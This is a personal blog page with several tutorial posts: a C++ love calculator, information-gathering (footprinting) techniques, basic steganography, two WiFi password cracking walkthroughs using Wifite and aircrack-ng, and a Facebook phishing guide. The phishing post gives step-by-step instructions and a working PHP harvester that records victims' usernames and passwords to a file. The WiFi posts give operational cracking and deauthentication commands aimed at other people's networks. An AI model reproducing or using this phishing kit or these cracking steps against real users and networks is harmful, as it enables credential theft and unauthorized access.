Himanshu

Negi

Developer & Internet Marketer


Welcome to my blog.

Sed sed leo sit amet elit sagittis fermentum. Nulla posuere commodo erat. Nam ac nunc ipsum, id espara tincidunt orci. Quisque adipiscing molestie dolor, ut congue sem porta et. Sed sapien urna, auctor et accumsan ut, accumsan sit amet dui. Nunc tristique interdum magna, dictum volutpat sem. Nam ac nunc ipsum, id espara tincidunt orci. Sed sapien urna, auctor et accumsan ut.

Love Calculator in C++ Programming and its Algorithm

May 15, 2017, wp-himu3 Comments

Love calculator or a compatibility calculator is basically a simple calculator program that calculates the compatibility between two person on the basis of their names and dates of birth (extra details may be asked by the programmer). Love Calculator (which is logically a simple programming calculator) can be created using any programming language or script. A love calculator sometimes is also refereed to as Friendship Calculator.

In this tutorial we are going to create a simple calculator using C++ Programming Language. Take a look at the following algorithm to understand how it works.

love calculator program in C++ image

Working image of C++ Simple Love Calculator program.

Algorithm of Love Calculator

STEP 1: Program asks for details (names of love couple) i.e. name1 and name2.

STEP 2: Program will then add name2 variable to name1 i.e. name1=name1+name2;

STEP 3 (Optional Step): Program will then eliminate common words from name1 variable i.e. APPLEMANGO will become APLEMNGO (Just to make it more complex, so that normal users can’t manually guess our love calculation formula).

STEP 4: Now each letter of name1 variable is converted from Char to Int (ASCII* values).

STEP 5: Now the sum of all the individual letters of name1 variable is divided by 101 and remainder is noted down (division by 101 ensures that at the end we’ll have a remainder smaller than or equal to 100).

STEP 6: The remainder is our compatibility or love percentage. Hurrree!

STEP 7: FINISH.

* ASCII (American Standard Code for Information Interchange): Computers don’t deal with text or graphics. The text (or anything) entered to a computer is converted to numbers at different levels. Simply understand that  when you press ‘a’ the ASCII value computer get is 97 and for b value is 98 and so on. For “A” value is 65 and B=66, C=67. Now the Funny thing, 0 means 48 in ASCII and 1 means 49 and so on. Read about Character Encoding to understand this stuff. We are going to take advantage of ASCII to convert a name into number, so that we can calculate some arithmetic value which we’ll call love percentage.

Working of Love Calculator  Explained

Love at the image, we are entering two names i.e. Abc & Cde respectively. Now the follwoing STEPS shows the background work by the program.

STEP 1: name1=Abc and name2=Cde;
STEP 2: name1=name1+name2 then name1=ABCDE; (tally these steps with above steps)
STEP 3: name1=ABCDE (common letters are eliminated).
STEP 4: sum=A+B+C+D+E i.e. sum=65+66+67+68+69;
STEP 5: sum/101 and lefts a remainder 32;
STEP 6: COMPATIBILITY PERCENTAGE=32;
STEP 7: FINISH.

Love Calculator in C++ Programming

[codesyntax lang=”cpp” title=”C++ love calculator program” bookmarkname=”bookmark” blockstate=”expanded”]

// C++ project on Love calculator or Compatibility Checker
// Website : https://himanshunegi.in/

// Header files included
#include<iostream.h>
#include<conio.h>       // gotoxy(), clrscr()
#include<string.h>
#include<ctype.h>
#include<stdio.h>
#include<stdlib.h>
#include<dos.h>          // for delay()

void main()		// Execution starts from here THE MAIN FUNCTION
{
char n1[30], n2[15];		// n1 means name1 and n2 means name2
clrscr();
textcolor(RED);
textbackground(LIGHTRED);

gotoxy(12,2);
cout<<"LOVE  CALCULATOR";

// STEP1 
gotoxy(8,8);
cout<<"Enter Your Name  :";
gotoxy(8,10);
cout<<"Enter Crush Name :";

gotoxy(28,8);
gets(n1);
gotoxy(28,10);
gets(n2);

// STEP2
strcat(n1,n2);	// copying name2 into name1
for(int i=0; i<strlen(n1); i++)		// Converting all letter to uppercase
n1[i]=toupper(n1[i]);

// STEP3 OPTIONAL CODE
for(int k=0; k<strlen(n1); k++)		// Eliminating common letters
{
for(int i=0; i<strlen(n1); i++)
{
	for(int j=0; j<strlen(n1); j++)
	{
		if(i==j)
		continue;
		else if(n1[i]==n1[j])
		n1[j]=n1[j+1];
	}
}
}
// STEP3 FINISHED 

int sum=0;

// STEP-4
for(int l=0; l<strlen(n1); l++)	// Assigning ASCII value to each letter A=65, B=66 and so on 
sum+=n1[l];

gotoxy(8,15);
cout<<"LOVE COMPATIBILITY : ";


/* Now Generating random percentage for a while to confuse the user
and make it interesting */

randomize();
for(int p=0; p<150; p++)		
{
gotoxy(31,15);
cout<<random(100)<<" %";
delay(30);
}

// STEP-5
gotoxy(31,15);			// Giving the actual Percentage
cout<<sum%101<<" %   GUARANTEED !";
getch();		// Holds screen until a key is pressed

}         // END OF PROGRAM

[/codesyntax]

 

Now at this stage, I’m realizing that the program code is not that simple but it’s interesting. I have given you some ideas to make it little interesting by adding few extra features like eliminating common characters in the name, displaying random love percentage for few second to create suspense etc..

As you know this is just a sample program developed by me in C++ but I hope you’ll add more functionality to this program. You can develop better and  efficient algorithm than this which may have some logic and practical fact. But my aim is accomplished here, to provide you with a basic idea on the topic. I hope I had successfully taught you how to create a love calculator in c++ programming language which is a little interesting than a normal love calculator.

If you have any suggestions or you are facing problem in this code then comment below!

Similar Tutorial: Love Calculator in Visual Basic (VB6)

So have you learned something from this C++ Programming Tutorial? Are you able to create your own C++ Love Calculator?

Footprinting – Information Gathering Techniques

May 15, 2017, wp-himu0 Comments

Footprinting is an ethical hacking process of gathering information about the target and its environment. This is a pre-attack stage and maximum efforts are deployed to ensure that the operations conducted are executed under stealth and target can’t trace back you. In the footpriting process several information gathering techniques and tools are used.

A hacker can use several freely available resources to gather maximum information passively. In this process no direct contact is made with the target. The information gathered through footprinting is crucial for later steps/attacks. 

Footprinting – List of Information Gathering Techniques

There are many techniques and tools used in footprinting. There is no predefined sequence of task in footprinting. You have to gather the maximum possible information therefore you use following sources.

Websites Footprinting: Just by visiting the target’s website you can collect great amount of information about them such as their emails addresses, partners, client’s list, physical addresses of their offices and HR openings etc.

Website can be further analyzed for error pages. Errors can appear if you put invalid data in search box or contact form. Errors can reveal details about website content management system software, its version, scripting and type of server used – linux or windows etc.

Whois Database Lookup: Whois lookup is an important step in information gathering process. Whois lookup against any website can reveal information about computer servers on which website is hosted & its location. Whois lookup also displays name, address and contact numbers of technical staff, domain owner and domain registrar.

WHOIS Lookup Websites:

  • www.whois.com
  • www.whois.domaintools.com
  • www.whois.net
  • www.whois.com/whois/
footprinting whois

Footprinting – whois

Search Engines Hacking: Marking a search query against your target in search engines (Google, Yahoo & Bing etc.) can also reveal great amount of information if used properly. Google Advance search or Google Hacking can help to locate more detailed information like company policies, employee’s details & online hidden pages etc.

Company’s details and reviews can be found at different blogs, website, reviews portal, forums etc.

Google Search Command: site:facebook.com “himanshu negi” + “hacking”

The above Google search query target facebook.com for all the persons having name Himanshu Negi and talking about “Hacking”.

Information gathering via Google

Information Gathering Techniques via Google

Similar Domain Search: If example.com is your target’s website then you can look at example.in, example.net, example.org for a worldwide variety sources. Further, looking for in.document.com, uk.document.com (country basis) or en.document.com (language basis) can reveal more useful information.

Same company may have different works at different countries and may be presenting different information in different languages. Similar domain search is important information from all different aspects and dimensions.

Try: touch.facebook.com, mbasic.facebook.com, facebook.com.

Negative Website Search: Negative website search against targets website can reveal some websites that gives insight into the problems which exist inside the organization. Suppose, your target is example.com then you may find example-company-sucks.com.

Paypal.com is a payment gateway website/company that helps to buy/sell stuff online and facilitate money transaction across borders worldwide. But below is the image of website that tells different story.

Negative Website - Information Gathering

Paypal Negative Website – Information Gathering

Social & Business Networking Websites: If you want more detailed information about a company or person then you must take a look at websites like linkedin.com, Google+ and similar. They can reveal some detailed business information and their professional connections.

Facebook website may have fake profiles/pages and non-official groups about a company. FB may not have trusted information about a company or person but sites like linkedin.com which is a professional social networking website usually have trusted information and frequently updated profiles and pages with insight information and great detailed.

Top Social Professional Websites: https://www.linkedin.com

People search/look-up websites may also prove helpful.

Classified/Job Websites: If you want to really know what a company’s offers and stuff and services the company sells then you must search information about the company at different classified sites. You’ll find some real working contact address and insight information.

Classified/Job sites may reveal some HR openings that may have information about the software and technologies that the target company uses. As they are looking for employees those work with the same technology they use, they generally reveal great information here.

Some Websites to Try:

  • www.locanto.in
  • www.olx.in
  • www.clickindia.com
  • www.quiker.com
  • www.naukri.com
  • www.monster.com

and many-many more.

Internet History – Achieve Pages: Footprinting also includes looking for information that was deleted from the website. Internet way-back machine can help you to find pages that are now history. Archive.org is a website established in 1996 which manages to achieve webpages of almost all websites.

Information or pages deleted from a website may have some ex-employees information. These ex-employees can be called and may reveal some great information about their ex-company and work.

Website: https://archive.org/

Footprinting - Archive.org - Web History

Footprinting – Archive.org – Web History

DNS Footprinting – MX Entry: DNS (domain name system) records look can reveal great amount of information including MX entry which indicates where and which email application or services are being used. This information can be used later to exploit mail services and accounts.

DNS Lookup Websites

  • www.dnswatch.info
  • www.who.is/dns
  • www.dnsstuff.com

Trace Route: tracert is a command that can used in both linux and windows which is used to trace path between a user and target system machines. Some websites also facilitate tracert/trace-routing.

website: https://who.is/tools/

Finally, Footprinting includes some great techniques to gather information passively. It is legal as long as you don’t misuse the collected information. These steps and techniques are very simple and any no-technical person can enjoy this but mind that it’s also very effective.

Footprinting is vital for all the hacking or information gathering steps you perform next.

What is Steganography? How to Hide Text Message behind an Image?

May 14, 2017, wp-himu0 Comments

What is Steganography? Steganography term is originated from Greek word; steganos means “covered” and graphien means “writing”. Steganography is the process of hiding a secret message with ordinary content, generally images, text and then extracting the messages when it reaches the destination. Anyone else who views this message will not be able to see the hidden content.

In steganography process, the data is first encrypted & then inserted in the normal the normal content, using special algorithm which may modify the contents of the file.

Steganography technique usually appends the data to a file, and some sophisticated steganography techniques may even disperse it throughout the file.

Program uses specially crafted algorithm which places the encrypted data in such a way that a unique pattern emerges (not visible to other programs, except it).

Common Hiding Techniques:

  • Appending data to a file.
  • Hiding Content in the unused header portion of the file near the beginning of the file contents.
  • Algorithm based dispersing of hidden message throughout the file.
  • Modification of LSP (Least Significant Bit).

Significance of Steganography!

Corporate world uses Steganography for disguising espionage attempts.

It is assumed that terrorist group makes use of Steganography to secretly communicate internally. And who knows, secret services and army uses the same.

Tools used for Steganography!

There are numerous tools used for steganography:

  • Steganos
  • S-tools for hiding data behind GIF & JPEG
  • StegHide for hiding data behind WAV and BMP
  • Invisible Secrets for hiding data behind JPEG
  • JPHide
  • Hiderman
    and many more!

File extensions bmp, jpeg, gif, wav and mp3 are generally used to carry hidden messages.

How to Hide Text Message in an Image using CMD!

Now, we’ll be hiding our text message behind an image using CMD (command prompt). This is the very basic example of steganography (Appending data to a file) and the best you can do right now.

  1. Arrange a file (in our case it’s image.jpg) and a text message file (in our case it’s text.txt).
  2. Open the command Prompt (Press Window Key+R then type CMD).
  3. Locate the path to your files (in our case it’s \DESKTOP\STEGNO).
  4. Type the command COPY /B image.jpg + text.txt newfile.jpg
  5. Done! Newfile.jpg contains your hidden message.
Steganography files

Steganography files

Note: If you understand DOS commands a little bit you can simple use the command ECHO “Steganography Hidden message here” >> image.jpg. This DOS command will simple echo or write your text message inside the file.

Steganography

Steganography

How to reveal hidden text message from image? You just have to open your steganography’s image file in a text editor like WordPad, notepad etc. (refer to the video).

Revealing hidden message

Revealing hidden message

What is Steganalysis? What are the tools Required?

Steganalysis is a study of identifying existence of hidden messages behind commonly used carrier files, the historical meaning of steganalysis means revealing the data, but in the modern world we usually use it while digitally hiding the data.

In simple words, steganalysis deal with the hidden content and identifying its existence.

Methods used for the detecting the use of Steganography:

  • Statistical Analysis
  • LSB Analysis
  • Noise floor Consistency Analysis

A few words on Steganography, There is a lot more to be learned in both Steganography and Steganalysis. You have just seen a very-very basic example which is no way used in real world for any purpose. As the above method of steganography provides next to no real security, don’t use it in real world for confidential purpose.

How to Hack WiFi Password Using Wifite? Cracking WEP, WPA, WPA2, WPS

May 14, 2017, wp-himu2 Comments

Wifite is a Linux platform tool (available on Kali, Backtrack 5, BlackBuntu, BackBox and Pentoo Operating Systems) which is used to attack multiple encrypted networks (WEP, WPA/2 and WPS) in a row. This tool is customized to be automated with only a few arguments. Wifite aims to be the “set it and forget it” wireless auditing tool. In this tutorial we’ll be using Wifite only to Hack WiFi password of WEP, WPA/2 and WPS Secured Networks.

INTRODUCTION TO WIFI’S SECURITY: WEP, WPA/WPA2 & WPS are different security technologies used to protect WiFi from unauthorized access.

WEP stands for Wired Equivalent Privacy,
WPA stands for Wi-Fi Protected Access &
WPS stands for Wi-Fi Protected Setup.

In this tutorial I’m going to demonstrate you – how to Hack WiFi password using Wifite. We’ll be hacking WEP, WPA, WPA2 (Same as WPA cracking) & WPS enabled WiFi using Wifite.

Also READ: How to find hidden files in Windows using DOS command?

THINGS WE NEED

  • Kali Linux OS (includes aircrack-ng suite and wifite tool).
  • External WiFi Adapter or inbuilt WiFi Device.

I have been asked several times about the WiFi adapter I’m using. It’s an external USB WiFi adapter:

  • [easyazon_link identifier=”B002SZEOLG” locale=”US” tag=”himsnegi-20″]TP-LINK TL-WN722N [/easyazon_link] (I’m using this)
  • [easyazon_link identifier=”B000WXSO76″ locale=”US” tag=”himsnegi-20″]Alfa Network AWUS036H High Power Wireless Adapter | 5dBi Antenna [/easyazon_link] (more powerful)

Kali and Aircrack-ng toolkit supports several Built-in WiFi cards but not all. If your built-in WiFi isn’t supported then you need to use one of these WiFi adapter.

Note: External Antenna’s of 9 dBi (comfortable and omnidirectional) to 24dBi (directional parabolic grid antenna) can be attached to extent the range of adapter.

Also READ: Truecaller Number Tracker! Trace Caller’s Name, Location and Photo!

TIME NEEDED – To Hack WiFi’s Passwords

Wifite is an awesome automated tool, very efficient and just asks you to choose your target. Of course, advance users can play with different switches and commands to can customize it according to their needs.

WEP – Usually less than 10 Minutes (2 min. in our case) – 99.9% Chances.
WPA or WPA2 – Usually few seconds to Never – 20% Chances.
WPS Enabled WPA/2 – Usually few hours (2 to 12 hours) – 50% Chances.

Read: Footprinting – Information Gathering Techniques (an ethical hacking process of gathering information about the target using public domain info and free tools).

Factors Affecting our Hacking Process:

  • Increase in distance between hacker and target decreases the process speed.
  • Increase in Traffic and no. of Users on target WiFi network increases process speed).
  • Poor wireless adapter decreases the WiFi cracking process speed (Generally speaking).
  • Large number of WiFi networks around you (usually on same channels) decreases speed.

Also Read: Alternative Software To Opt Out Of Global Data Surveillance! (Protect your privacy!)

Tutorial: Let’s Hack WiFi Passwords with Wifite:

Ready to Hack WiFi Password? First Go to Application > Kali Linux > Wireless Attacks > 802.11 wireless tools > Wifite; or simply type wifite in Terminal. Now you can see List of Available WiFi Access Points. (you must be root).

WIFITE-TUTORIAL

 

Now wait for few seconds or a couple of minutes, you’ll see all nearby WiFi Listed. You’ll  notice three types of WiFi’s i.e. WEP, WPA/WPA2 (with and without WPS enabled). We’ll hack each one of them.

Let’s begin with WEP cracking and then we’ll move to WPA/WPA2 and finally to WPS enabled WPA/WPA2.

* Choosing a WiFi with good signal strength and having client(s) associated with that AP (Access Point) will be the best deal otherwise get ready for frustration!

Also Read: What is Steganography? How to Hide Text Message behind an Image?

How to Hack WiFi Password – WEP?

You don’t have to do anything when you have Wifite. Just choose the appropriate target NUM (1,2,3,..,n) to crack it. There are currently 5 attacks available for cracking WEP key that ensures almost 100% chances of getting the WEP WiFi password.

It shouldn’t take more than 10 minutes for an attack to be completed. If one WEP Wifi attack fails, the other will be automatically come into action (for next 10 minutes).

In the image below, I’ll choose NUM 2 Wifi which is WEP and have clients, although signal is quiet low. After selecting “2” the WEP WiFi got cracked in just 2 minutes. That’s simply Amazing!

CRACK WEP KEY WIFITE

The WEP Key is a Hexadecimal representation of WEP WiFi’s password. You can simply use the WEP Key as the WiFi password. You can also convert it into human readable form (actual password) using any free online Hex-to-ASCII converter.

Note: I had also shown same WEP WiFi password hacking (with aircrack-ng suite) in my previous article – How to Crack WEP WiFi Key on Kali Linux Using Aircrack-ng!.

Cracking WPS WiFi Password

Just like above WEP WiFi password hacking, you don’t have to do anything much. Just choose your target (WPS enabled) and see the magic. As mentioned it might take few minutes to some hours depending on router you are attacking. So, be patient when you’ll try to Hack WiFi Password of WPS enabled WPA/WPA2 Network!

WIFITE WPS

Trouble shooting: Some routers will block you from brute-forcing (pin attack) and Wifite will display “WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking”, at that time you might be out of luck and have to tweak Wifite with some customizing commands. Many tweaks are available online, just Google for it.

(Hint: Spoofing MAC identical to an associated client or using delayed PIN attack –d 60 might help!)

NOTE: Wifite internally uses reaver (a WPS only WiFi password hacking software) to accomplish above WPS cracking task. As far as I know Wifite don’t provide reaver’s feature of saving current progress (no pause option). That means if Wifite fails with WPS, you have to start again but with reaver you can save you progress automatically and resume WPS cracking next day or next week .

Also READ: How to Hack Facebook Account Password with Phishing?

How to Hack WPA/WPA2 WiFi Password?

Now again, following the above fashion, you don’t have to do anything. Just choose your WPA/WPA2 target and see the miracle. As mentioned it might take few minutes to Never depending on WiFi’s password strength. The stronger the password, the difficult will the password hacking process.

Handshake is a file that is captured when router (WiFi Access Point) and client(s) (laptop, mobile or other WiFi enabled devices) communicate to authenticate each other. Handshake file contains password but in encrypted form. We will try different password combination on the encrypted password to get the original password (known as brute forcing). Brute-forcing is done offline and handshake can be easily captured in less than 2 minutes.

A dictionary file is a file that usually contains all known words from different dictionaries (English or other languages) and other sources. These words or phrases can be a WiFi password. Usually most dictionaries contains few thousands to billions of passwords.

A password file may contain all possible words created using combination of different character and numbers (even special symbols) in a file that becomes very huge and needs a lot of computational/cracking power.

Hint: You can use rockyou.txt, darkcode.lst or crackstation dictionaries-password files. Also Read: How to Access Blocked Websites with Proxy Websites?

Hack WPA2 Wifi Wifite

The above command will crack the saved handshake (TEST_C0-A0-BB-04-5C-A9.cap) using a password file (rockyou.txt) that is saved by me at /root/DICTIONARY/.

Cracking WPA WPA2 WIFI PAssword

 

The above WPA2 Got cracked easily because password was easy, but if you’re dealing with strong password you may have to wait for hours, days or months to crack it. The truth is that even after trying for months you may fail to recover strong WiFi passwords.

You might also be interested in reading the article – How to Crack WEP WiFi Key on Kali Linux Using Aircrack-ng!

NOTE: There is possibility that your wireless card is not compatible with Aircrack-ng, Wifite or Kali Linux for some reason. In this case, use on of the above mentioned external USB WiFi adapter.

Also READ: How someone can find your Real Address? Trace Exact Location in India!

BOOKS – Know More about WiFi Hacking!

If you are actually interested in WiFi hacking and Security. Then, I recommend reading:

[easyazon_image align=”none” height=”300″ identifier=”0071827633″ locale=”US” src=”https://himanshunegi.in/wp-content/uploads/51qYewzQDRL.jpg” tag=”himsnegi-20″ width=”220″]

Also READ: Truecaller Number Tracker! Trace Caller’s Name, Location and Photo!

How to Protect your WiFi from getting Hacked?

From the above demonstration it’s understood that WiFi’s password hacking process is very easy. You should now focus on tightening your WiFi security (instead of going to jail for any hacking act). I hope this articles makes average Internet user aware about information security and WiFi hacking. Following are some tips you can implement for WiFi security.

  • Change WiFi security from WEP to WPA/WPA2. WEP is now depreciated security protection.
  • Don’t enable WPS as it has lots of vulnerabilities. Google for WPS CVE (Common Vulnerabilities and Exposures).
  • Change your WiFi password periodically so that in case someone gets hands on your WiFi password, he/she shouldn’t be able to enjoy your free Internet for long .
  • Finally, try to hack your own WiFi Password (as shown in this article) then try to upgrade your security. then repeat the WiFi auditing process and confirm your security gain.

Now, you know how to use wifite and how to Hack WiFi password. Tell me your experiences and stop searching for WiFi password finder and Windows WiFi hacking software. Next? What is Phishing? How to Hack Facebook Account Password?

How to Hack Wifi? Cracking WEP Key on Kali Linux Using Aircrack-ng!

May 14, 2017, wp-himu11 Comments

How to Hack Wifi or how someone could Hack your Wifi? In this article I’m going to teach you how a Wifi using WEP security can be easily hacked and how to protect. I’ll be cracking WEP Key on Kali Linux system using Aircrack-ng software suite!

Before we go further, I want you to know a little about Wifi security system. So today every wifi is somehow protected and you’ll hardly find any wifi network which is open and using plane-text communication, at least not in India. You will usually find WEP, WPA or WPA2 secure wifi. WEP (Wired Equivalent Privacy) provides less security while WPA (Wi-Fi Protected Access) and WPA2 (Wi-Fi Protected Access II) both have better security.

So who is using WEP Wifi Security? Most Wifi devices which are old can use only WEP encryption and authentication. Some modern Wifi devices by default have WEP security or some ISP configures them like that for their users. Some home users still prefer WEP security and that’s how there are many targets for a hacker.

Also READ: Wifite | How to Hack WiFi Password? Cracking WEP, WPA/WPA2, WPS!

I have been asked several times about the WiFi adapter I’m using. It’s an external USB WiFi adapter:

  • [easyazon_link identifier=”B002SZEOLG” locale=”US” tag=”himsnegi-20″]TP-LINK TL-WN722N[/easyazon_link] (I’m using this)
  • [easyazon_link identifier=”B000WXSO76″ locale=”US” tag=”himsnegi-20″]Alfa Network AWUS036H High Power Wireless Adapter | 5dBi Antenna [/easyazon_link] (more powerful)

Kali and Aircrack-ng toolkit supports several Built-in WiFi cards but not all. If your built-in WiFi isn’t supported then you need to use one of these WiFi adapter.

Note: External Antenna’s of 9 dBi (comfortable and omnidirectional) to 24dBi (directional parabolic grid antenna) can be attached to extent the range of adapter.

Also READ: What is Phishing? How to Hack Facebook Account Password?

Steps For Hacking WiFi & Cracking WEP Key on Kali Linux:

Let’s begin… Open the Terminal and Type the following command to find whether your wireless card is working or not.

airmon-ng

If you get something like following image then your wireless card is available and working.

airmon-ng

Now type the following command to put your wireless card in monitoring mode.

airmon-ng start wlan0

starting wireless card

If you got the above image then your wireless card is in monitoring mode and working. Now type the following command to listen to the wireless network around you and get details about them.

airodump-ng mon0

Note that mon0 might be mon1, mon2, mon3 etc. depending upon the number of monitoring mode already running on your system. Find the monitoring mode (ie. mon1, mon2 etc.) from the precious image.

listning wireless network

Now here our target is “mtnl” which is using WEP encryption and authentication. Wifi mtnl is working on channel 4 and bssid is 0C:D2:B5:03:43:68. Now type the following command to start capturing its packet which might have encrypted password.

airodump-ng –w mtnl-org –c 4 –bssid 0C:D2:B5:03:43:68 mon0

command to capture packet

Let me explain the command, -w is for writing into a file that we are going to create i.e. mtnl-org, -c is used for channel which is currently 4.

Now after typing the command wait for 10-15 minutes to capture around 15,000 ivs packets. The time duration depends on the traffic on network, your distance from the access point and actually the no. of ivs you have captured (refer to the next image).

Hey, if there is only few packets coming then you can try to deauth to generate more data packets with following command:

aireplay-ng -0 0 -a 0C:D2:B5:03:43:68 mon0

Also Read: Footprinting – Information Gathering Techniques (an ethical hacking process of gathering information about the target using public domain info and free tools).

Finally, Type the following command to start cracking WEP key of the network.

aircrack-ng mtnl-org-01.cap

Notice the file name carefully as the program automatically ads -01, -02, -03 etc. to the file name you have suggested. It depends upon the no. of file you have with same name.

After a few seconds or minutes you will find that the password is 100% decrypted or WEP key is cracked and password is 3937353536.

Cracking WEP Key on Kali Linux

Cracking WEP Key on Kali Linux

NOTE: This was surely a little lengthy process of cracking WiFi’s WEP Key. You might be interested in hacking other types of secure WiFi networks such as WPA, WPA2 or WPS in an automated way, then read my latest article – How to Hack WiFi Password? WEP, WPA/WPA2, WPS – Wifite!

Troubleshooting: If you were unable to crack WEP key of your WiFi then you might have typed wrong command or had input wrong value like channel number, bssid or something. Be Careful!

You might not have captured enough packets and ivs that are necessary to crack the WEP key.

Also Read: What is Steganography? How to Hide Text Message behind an Image?

BOOKS – Know More about WiFi Hacking!

If you are actually interested in WiFi hacking and Security. Then, I recommend reading:

[easyazon_image align=”none” height=”300″ identifier=”0071827633″ locale=”US” src=”https://himanshunegi.in/wp-content/uploads/51qYewzQDRL.jpg” tag=”himsnegi-20″ width=”220″]

Also Read: Alternative Software To Opt Out Of Global Data Surveillance! (Protect your privacy!)

How to Secure your WiFi and its Password?

At this position you might have understood that WEP doesn’t provide enough security so you should switch to better security (WPA or WPA2).

Use strong password and change it regularly. In case, if someone gets your password they won’t be able to enjoy your free WiFi for longer.

You can find more WiFi security tips in my another article – Wifite | How to Hack WiFi Password?

What is Phishing? How to Hack Facebook Account Password with Phishing?

May 13, 2017, wp-himu4 Comments

Phishing is a hacking technique in which hacker setup a fake website that is usually clone of a legitimate website and looks genuine to a normal internet user. Then the hacker tricks (using social engineering) the target (someone specific or bulk unknown users) to login through this phishing website so that he (Hacker) could log and steal target’s password & other important details.

Just for your information, phishing is a very successful hacking technique and works even smoothly to hack and trick computer professional and experts, if done properly. In phishing process, once the innocent user submits their detail to hacker (i.e. phishing website), victim is redirected to original website and everything works smoothly (because phishing website submits collected victim’s username and password to the original website and victim successfully log-ins and get access to original website and nothing changes for the victim at that time).

In this article I’m going to demonstrate you how simple facebook phishing is (with the help of video) and how to protect yourself from phishing. 

Hacking Facebook Account & Password using Phishing:

To demonstrate phishing we need two necessary things:

  1. A webhost or webserver where your fake pages (phishing websites) will be hosted.
  2. A phishing website itself that should have the capability to store facebook passwords.

First we’ll setup an account at some web hosting company. I will choose www.000webhost.com free web hosting and will then signup for a free account there. I have selected www.visititsoon.comlu.com sub-domain (refer the video). Confirm the account via email verification and then move to next step.

Now visit to www.facebook.com then make a right click on the facebook login page and click on “view page source”. You’ll get source code of facebook page then select all facebook code and copy it.

Visit to www.notepad-plus-plus.org and download the notepad++ software and install it. Open notepad++ and paste all the copied facebook source code there. Now search for ‘action’ word in it and locate following lines:

<form id=”login_form” action=”https://www.facebook.com/login.php?login_attempt=1” method=”post” onsubmit=”return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)”>

Change the above link to http://visititsoon.comlu.com/mail.php (replace “visititsoon.comlu.com” with your own domain name) and save the file as index.htm.

Now following is the mail.php file, copy it and edit the links to your own domain name (actually replace them with full path of your phishing pages). Now the data (username, password and other details) entered by victim will be transferred to mail.php which will handle all the data and store it in pass.txt file for you (hacker).

[codesyntax lang=”php” title=”MAIL.PHP” bookmarkname=”MAIL.PHP”]

<?php
header ('Location: http://visititsoon.comlu.com/index.html');

$posts        = 'http://visititsoon.comlu.com/index.html';
foreach($_POST as $k => $v){
    $posts .= '$_POST['.$k.'] = '.$v."\n";
}

$posts  .= "------------------------------------------\n";
$emailto = '';
$from    = "";
$body        = '
'.$posts.'
';

@mail($emailto, $subject, $body, $from);
$handle = @fopen("pass.txt", "a+");
@fwrite($handle, $posts);
fclose($handle);
?>

[/codesyntax]

Now you both files (index.html and mail.php) are ready. Login to web hosting account and then go to cpanel and use file manager to upload these two files (refer to video).

Now your phishing website with capability to store password & other details are setup. Now it’s time for social engineering to trick you target to login to your phishing website. 

The Story: How Facebook account and password will be hacked?

When the target will visit your domain (phishing website) or you’ll trick the target to visit there, target will see facebook (actually, cloned website) hosted on your domain.

As usual, target will hopefully not notice the phishing website and will try to login into it. Then he will lose his facebook account password, how?

Phishing Facebook

After writing username and password, when the target will click login button – the facebook password and account details will be send to your mail.php file. Mail.php file will create a pass.txt file (if not already present) and will then store the passwords and other account details there.     

Hacker will login to web hosting account and will then read the content of pass.txt later (i.e. account detail and passwords).

Facebook Account Password

WARNING: THIS VIDEO AND ARTICLE ARE FOR EDUCATIONAL PURPOSE ONLY. PHISHING IS CRIME AND SO HACKING. DO NOT TRY THIS TO TARGET ANYONE AS THIS (PHISHING OR HACKING) MAY LEAD YOU TO SPEND YOUR REMAINING LIFE IN PRISON.

(Unfortunately YouTube removed that video but find you can still find the transcript at http://www.allreadable.com/1656FRLF and video at http://tune.pk/video/4221049/how-to-hack-facebook-account-and-password)

TIPS to Stay Safe Against Phishing Attacks:

  1. Use popular and updated web browsers such as Google Chrome, Mozilla Firefox, Apple-Safari, Opera etc. They can easily detect phishing pages and websites (refer to video).
  2. Use a good antivirus (additionally anti-spyware &  anti-adware protection) as they usually help detect and block these phishing pages.
  3. Before logging into any website’s account don’t forget to check browser’s address bar to confirm the webpage address and website’s location. Note: Important websites uses https:// instead of http:// (‘s’ can be seen as secure) in URL (for eg. https://facebook.com, Google.com , All Banks’ website etc.).
  4. Don’t visit the webpages you don’t trust or at least don’t submit important details such as username, account’s password, PIN and other credentials.
www.edatastyle.com www.introducingsomething.com